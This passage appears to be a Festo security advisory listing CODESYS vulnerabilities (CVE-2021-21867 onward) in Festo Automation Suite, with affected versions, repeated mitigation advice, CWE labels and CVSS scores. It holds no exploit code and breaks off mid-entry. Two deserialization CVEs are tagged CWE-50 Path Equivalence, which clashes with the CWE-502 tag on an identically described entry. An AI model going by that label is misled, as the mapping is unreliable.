3.1 7.8 HIGH CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H CVE-2021-21867 An unsafe deserialization vulnerability exists in the ObjectManager.plugin ObjectStream.ProfileByteArray functionality of CODESYS GmbH CODESYS Development System 3.5.16 and 3.5.17. A specially crafted file can lead to arbitrary command execution. An attacker can provide a malicious file to trigger this vulnerability. View CVE Details Affected Products CODESYS in Festo Automation Suite Vendor: FESTO, CODESYS Product Version: FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/* Product Status: known_affected Remediations Mitigation FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk: Mitigation Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo. Mitigation The following product versions have been fixed: Mitigation CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://certvde.com/en/advisories/VDE-2025-108 Relevant CWE: CWE-50 Path Equivalence: '//multiple/leading/slash' Metrics CVSS Version Base Score Base Severity Vector String 3.1 7.8 HIGH CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H CVE-2021-21868 An unsafe deserialization vulnerability exists in the ObjectManager.plugin Project.get_MissingTypes() functionality of CODESYS GmbH CODESYS Development System 3.5.16 and 3.5.17. A specially crafted file can lead to arbitrary command execution. An attacker can provide a malicious file to trigger this vulnerability. View CVE Details Affected Products CODESYS in Festo Automation Suite Vendor: FESTO, CODESYS Product Version: FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/* Product Status: known_affected Remediations Mitigation FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk: Mitigation Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo. Mitigation The following product versions have been fixed: Mitigation CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://certvde.com/en/advisories/VDE-2025-108 Relevant CWE: CWE-50 Path Equivalence: '//multiple/leading/slash' Metrics CVSS Version Base Score Base Severity Vector String 3.1 7.8 HIGH CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H CVE-2021-21869 An unsafe deserialization vulnerability exists in the Engine.plugin ProfileInformation ProfileData functionality of CODESYS GmbH CODESYS Development System 3.5.16 and 3.5.17. A specially crafted file can lead to arbitrary command execution. An attacker can provide a malicious file to trigger this vulnerability. View CVE Details Affected Products CODESYS in Festo Automation Suite Vendor: FESTO, CODESYS Product Version: FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/* Product Status: known_affected Remediations Mitigation FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk: Mitigation Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo. Mitigation The following product versions have been fixed: Mitigation CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://certvde.com/en/advisories/VDE-2025-108 Relevant CWE: CWE-502 Deserialization of Untrusted Data Metrics CVSS Version Base Score Base Severity Vector String 3.1 7.8 HIGH CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H CVE-2021-29239 CODESYS Development System 3 before 3.5.17.0 displays or executes malicious documents or files embedded in libraries without first checking their validity. View CVE Details Affected Products CODESYS in Festo Automation Suite Vendor: FESTO, CODESYS Product Version: FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/* Product Status: known_affected Remediations Mitigation FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk: Mitigation Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo. Mitigation The following product versions have been fixed: Mitigation CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://certvde.com/en/advisories/VDE-2025-108 Relevant CWE: CWE-345 Insufficient Verification of Data Authenticity Metrics CVSS Version Base Score Base Severity Vector String 3.1 7.8 HIGH CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H CVE-2021-29240 The Package Manager of CODESYS Development System 3 before 3.5.17.0 does not check the validity of packages before installation and may be used to install CODESYS packages with malicious content. View CVE Details Affected Products CODESYS in Festo Automation Suite Vendor: FESTO, CODESYS Product Version: FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/* Product Status: known_affected Remediations Mitigation FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk: Mitigation Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo. Mitigation The following product versions have been fixed: Mitigation CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://certvde.com/en/advisories/VDE-2025-108 Relevant CWE: CWE-345 Insufficient Verification of Data Authenticity Metrics CVSS Version Base Score Base Severity Vector String 3.1 7.8 HIGH CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H CVE-2021-29241 CODESYS Gateway 3 before 3.5.16.70 has a NULL pointer dereference that may result in a denial of service (DoS). View CVE Details Affected Products CODESYS in Festo Automation Suite Vendor: FESTO, CODESYS Product Version: FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/* Product Status: known_affected Remediations Mitigation FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk: Mitigation Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo. Mitigation The following product versions have been fixed: Mitigation CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://certvde.com/en/advisories/VDE-2025-108 Relevant CWE: CWE-476 NULL Pointer Dereference Metrics CVSS Version Base Score Base Severity Vector String 3.1 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H CVE-2021-29242 CODESYS Control Runtime system before 3.5.17.0 has improper input validation. Attackers can send crafted communication packets to change the router's addressing scheme and may re-route, add, remove or change low level communication packages. View CVE Details Affected Products CODESYS in Festo Automation Suite Vendor: FESTO, CODESYS Product Version: FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/* Product Status: known_affected Remediations Mitigation FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk: Mitigation Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo. Mitigation The following product versions have been fixed: Mitigation CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://certvde.com/en/advisories/VDE-2025-108 Relevant CWE: CWE-20 Improper Input Validation Metrics CVSS Version Base Score Base Severity Vector String 3.1 7.3 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L CVE-2021-30186 CODESYS V2 runtime system SP before 2.4.7.55 has a Heap-based Buffer Overflow. View CVE Details Affected Products CODESYS in Festo Automation Suite Vendor: FESTO, CODESYS Product Version: FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/* Product Status: known_affected Remediations Mitigation FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk: Mitigation Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo. Mitigation The following product versions have been fixed: Mitigation CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://certvde.com/en/advisories/VDE-2025-108 Relevant CWE: CWE-787 Out-of-bounds Write Metrics CVSS Version Base Score Base Severity Vector String 3.1 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H CVE-2021-30187 CODESYS V2 runtime system SP before 2.4.7.55 has Improper Neutralization of Special Elements used in an OS Command. View CVE Details Affected Products CODESYS in Festo Automation Suite Vendor: FESTO, CODESYS Product Version: FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/* Product Status: known_affected Remediations Mitigation FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk: Mitigation Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo. Mitigation The following product versions have been fixed: Mitigation CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://certvde.com/en/advisories/VDE-2025-108 Relevant CWE: CWE-78 Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') Metrics CVSS Version Base Score Base Severity Vector String 3.1 5.3 MEDIUM CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L CVE-2021-30188 CODESYS V2 runtime system SP before 2.4.7.55 has a Stack-based Buffer Overflow. View CVE Details Affected Products CODESYS in Festo Automation Suite Vendor: FESTO, CODESYS Product Version: FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/* Product Status: known_affected Remediations Mitigation FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk: Mitigation Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo. Mitigation The following product versions have been fixed: Mitigation CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://certvde.com/en/advisories/VDE-2025-108 Relevant CWE: CWE-787 Out-of-bounds Write Metrics CVSS Version Base Score Base Severity Vector String 3.1 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H CVE-2021-30190 CODESYS V2 Web-Server before 1.1.9.20 has Improper Access Control. View CVE Details Affected Products CODESYS in Festo Automation Suite Vendor: FESTO, CODESYS Product Version: FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/* Product Status: known_affected Remediations Mitigation FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk: Mitigation Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo. Mitigation The following product versions have been fixed: Mitigation CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://certvde.com/en/advisories/VDE-2025-108 Relevant CWE: CWE-306 Missing Authentication for Critical Function Metrics CVSS Version Base Score Base Severity Vector String 3.1 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H CVE-2021-30195 CODESYS V2 runtime system before 2.4.7.55 has Improper Input Validation. View CVE Details Affected Products CODESYS in Festo Automation Suite Vendor: FESTO, CODESYS Product Version: FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/* Product Status: known_affected Remediations Mitigation FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk: Mitigation Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo. Mitigation The following product versions have been fixed: Mitigation CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://certvde.com/en/advisories/VDE-2025-108 Relevant CWE: CWE-125 Out-of-bounds Read Metrics CVSS Version Base Score Base Severity Vector String 3.1 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H CVE-2021-33485 CODESYS Control Runtime system before 3.5.17.10 has a Heap-based Buffer Overflow. View CVE Details Affected Products CODESYS in Festo Automation Suite Vendor: FESTO, CODESYS Product Version: FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/* Product Status: known_affected Remediations Mitigation FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk: Mitigation Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo. Mitigation The following product versions have been fixed: Mitigation CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://certvde.com/en/advisories/VDE-2025-108 Relevant CWE: CWE-787 Out-of-bounds Write Metrics CVSS Version Base Score Base Severity Vector String 3.1 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H CVE-2021-33486 All versions of the CODESYS V3 Runtime Toolkit for VxWorks from version V3.5.8.0 and before version V3.5.17.10 have Improper Handling of Exceptional Conditions. View CVE Details Affected Products CODESYS in Festo Automation Suite Vendor: FESTO, CODESYS Product Version: FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/* Product Status: known_affected Remediations Mitigation FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk: Mitigation Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo. Mitigation The following product versions have been fixed: Mitigation CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs Mitigation For more information see the associated 